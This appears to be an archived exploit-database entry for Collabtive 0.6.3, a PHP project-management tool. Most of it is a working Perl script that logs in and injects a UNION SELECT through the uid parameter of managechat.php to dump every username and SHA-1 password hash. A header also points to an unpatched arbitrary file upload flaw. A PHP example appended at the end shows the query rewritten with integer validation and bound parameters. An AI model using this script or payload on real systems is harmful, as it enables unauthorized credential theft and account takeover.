Collabtive 0.6.3 SQL Injection

Posted Jun 14, 2010
Authored by DNX

Collabtive version 0.6.3 remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 9ec3e039605c32c504e4bacd2beade84a8f7046a9838022866aafe5849bc673b

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;

# \#'#/
# (-.-)
# ------------------oOO---(_)---OOo-----------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Research Division /____/ 2o1o |
# --------------------------------------------------
# | Collabtive v0.6.3 Multiple Vulnerabilities |
# --------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: http://starbugs.host.sk
# [!] Vendor........: http://collabtive.o-dyn.de
# [!] Detected......: 04.06.2010
# [!] Reported......: 05.06.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Collabtive is a web-based project management software.
# The project started in November 2007. It is
# open-source software and provides an alternative to proprietary
# tools such as Basecamp. Collabtive is written in PHP.
#
# Collabtive is developed by a professional team.
#
# [!] Requirements..: Account needed
#
# [!] Bug...........: $_GET['uid'] in managechat.php near line 64
#
# 12: $userto_id = getArrayVal($_GET, "uid");
#
# 64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");
#
# The password is hashed with SHA-1.
#
# [!] Bug...........: The arbitrary file upload discovered by USH is still present.
# See http://www.milw0rm.com/exploits/7076 for more details.
#

if(!$ARGV[5])
{
    print "\n \\#'#/ ";
    print "\n (-.-) ";
    print "\n ---------------oOO---(_)---OOo---------------";
    print "\n | Collabtive v0.6.3 SQL Injection Exploit |";
    print "\n | coded by DNX |";
    print "\n ---------------------------------------------";
    print "\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";
    print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";
    print "\n[!] Options:";
    print "\n -user [text] Username";
    print "\n -pass [text] Password";
    print "\n -p [ip:port] Proxy support";
    print "\n";
    exit;
}

my %options = ();
GetOptions(\%options, "user=s", "pass=s", "p=s");
my $ua = LWP::UserAgent->new();
my $cookie = HTTP::Cookies->new();
my $host = $ARGV[0];
my $path = $ARGV[1];
my $target = "http://".$host.$path;
my $user = "";
my $pass = "";

if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
if($options{"user"}) { $user = $options{"user"}; }
if($options{"pass"}) { $pass = $options{"pass"}; }

print "[!] Exploiting...\n\n";

exploit();

print "\n[!] Done\n";

sub exploit
{
    ##############
    # make login #
    ##############

    my $url = $target."manageuser.php?action=login";
    my $res = $ua->post($url, [username => $user, pass => $pass]);
    $cookie->extract_cookies($res);
    $ua->cookie_jar($cookie);

    ############################
    # get users with passwords #
    ############################

    $url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
    $res = $ua->get($url);
    my $content = $res->content;

    my @c = split(/<br \/>/, $content);
    foreach (@c)
    {
        if($_ =~ /<b>(.*?):<\/b> (.*)/)
        {
            print $1.":".$2."\n";
        }
    }
}
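
The header above traces the injection to `uid` being concatenated into the query at line 64 of managechat.php. The following is an added example, not Collabtive's code and not part of DNX's exploit, showing that query with integer validation and bound parameters. The in-memory SQLite database, the `chat` column layout, the sample row and the function name `pullChat` are assumptions made so the example runs offline.

```php
<?php
// Added example: hardened form of the line-64 query. Not Collabtive's code.
// The chat column layout and the sample row are constructed for the demo.

function pullChat(PDO $db, int $userid, $uidRaw, int $start): array
{
    // uid must be a plain non-negative integer; anything else is rejected
    // before it can reach the SQL layer.
    $userto = filter_var($uidRaw, FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 0]]);
    if ($userto === false) {
        throw new InvalidArgumentException('uid must be a non-negative integer');
    }

    // Values are bound, never concatenated, so the query shape is fixed.
    $stmt = $db->prepare(
        'SELECT * FROM chat
          WHERE ufrom_id  IN (:me1, :to1)
            AND userto_id IN (:me2, :to2)
            AND time > :start
          ORDER BY time ASC'
    );
    $params = [':me1' => $userid, ':to1' => $userto,
               ':me2' => $userid, ':to2' => $userto, ':start' => $start];
    foreach ($params as $name => $value) {
        $stmt->bindValue($name, $value, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE chat (id INTEGER PRIMARY KEY, time INTEGER,
           ufrom TEXT, ufrom_id INTEGER, userto TEXT, userto_id INTEGER, text TEXT)');
$db->exec("INSERT INTO chat VALUES (1, 100, 'alice', 1, 'bob', 2, 'hello')");

// A numeric uid returns the conversation between users 1 and 2.
echo count(pullChat($db, 1, '2', 0)), " row(s)\n";

// Non-numeric input of the kind the exploit sends is refused.
try {
    pullChat($db, 1, '0) union select 1', 0);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

In the application itself the same two steps apply to `getArrayVal($_GET, "uid")`: validate it as an integer, then bind it rather than interpolating it into the `IN(...)` lists.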